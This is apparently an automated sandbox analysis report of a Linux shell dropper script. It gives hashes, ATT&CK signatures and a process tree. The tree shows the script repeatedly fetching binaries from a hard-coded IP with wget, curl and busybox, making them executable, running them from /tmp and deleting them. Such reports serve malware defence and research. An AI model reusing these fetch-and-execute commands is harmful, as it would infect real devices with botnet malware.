Analysis
-
max time kernel
65s -
max time network
69s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
14-11-2024 02:53
Static task
static1
Behavioral task
behavioral1
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
-
Size
10KB
-
MD5
920017685299c34fe40ed0d31390a654
-
SHA1
15be0738ab44434517b3a1bb41d0ba9752f0da28
-
SHA256
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
-
SHA512
345ccb820bce7b8dfc3acfa03f31c9b6f78085244b384f3120613434fc0e99ba7ff0dd572b530fb2ed261d9b8216390818d7773df018ccdd230cee2fa8b4a6a4
-
SSDEEP
192:wueun7kYb/vUMNghVWlhZHWaW2lVlwc4ueun7wb/vUMM8lVlwcKhZHWaP:wueun7kYb/vUMNghV92lVlwc4ueun7w4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 17 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 690 chmod 749 chmod 763 chmod 794 chmod 814 chmod 680 chmod 778 chmod 806 chmod 832 chmod 840 chmod 720 chmod 820 chmod 846 chmod 854 chmod 860 chmod 868 chmod 826 chmod -
Executes dropped EXE 17 IoCs
Processes:
49irlYlhW1pQmwlDaVrLaKzYecToHyUObHqHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTyV565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42i7eUZodswPOZ3YHkvfHkejyH5tSnDy932lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOPdvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cwgZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs1BSmB9KGuK6znFf5VBDep3VxMqq2wef23zS1yQbJJqsxutFfMd773H9H8eSVOHhHs3dbIzUor4CncpgQBrMSVS6lA6UObBDbUtCYRqysc6biA4IgoxzZzjEFUn82WVsduROTl3DQxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt49irlYlhW1pQmwlDaVrLaKzYecToHyUObHlZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOPioc pid Process /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH 682 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy 691 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz 722 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 750 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 764 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD 780 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP 796 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw 807 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs 815 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z 821 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db 827 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq 833 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ 841 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 847 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH 855 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD 861 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP 869 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP -
Checks CPU configuration 1 TTPs 17 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlbusyboxxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztrmpid Process 843 wget 844 curl 845 busybox 847 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 848 rm -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz curl File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw curl File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs curl File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z curl File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ curl File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH curl File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy curl File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 curl File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 curl File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP curl File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP curl File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH curl File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db curl File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD curl File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt curl File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD curl File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq curl
Processes
-
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh1⤵PID:650
-
/bin/rm/bin/rm bins.sh2⤵PID:658
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:660
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:668
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:677
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:680
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:682
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:683
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:685
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:687
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:689
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:691
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:692
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:693
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:694
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:699
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:722
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:723
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:725
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:747
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:751
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:752
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:759
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:765
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:766
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:775
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:781
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:782
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:786
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:792
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:797
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:799
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:805
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:808
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:809
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:813
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:817
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:819
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:822
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:823
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:825
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:828
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:829
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:831
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:834
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:835
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:837
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:842
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:843
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:845
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:847
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:849
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:853
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:856
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:859
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:867
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:870
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:871
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97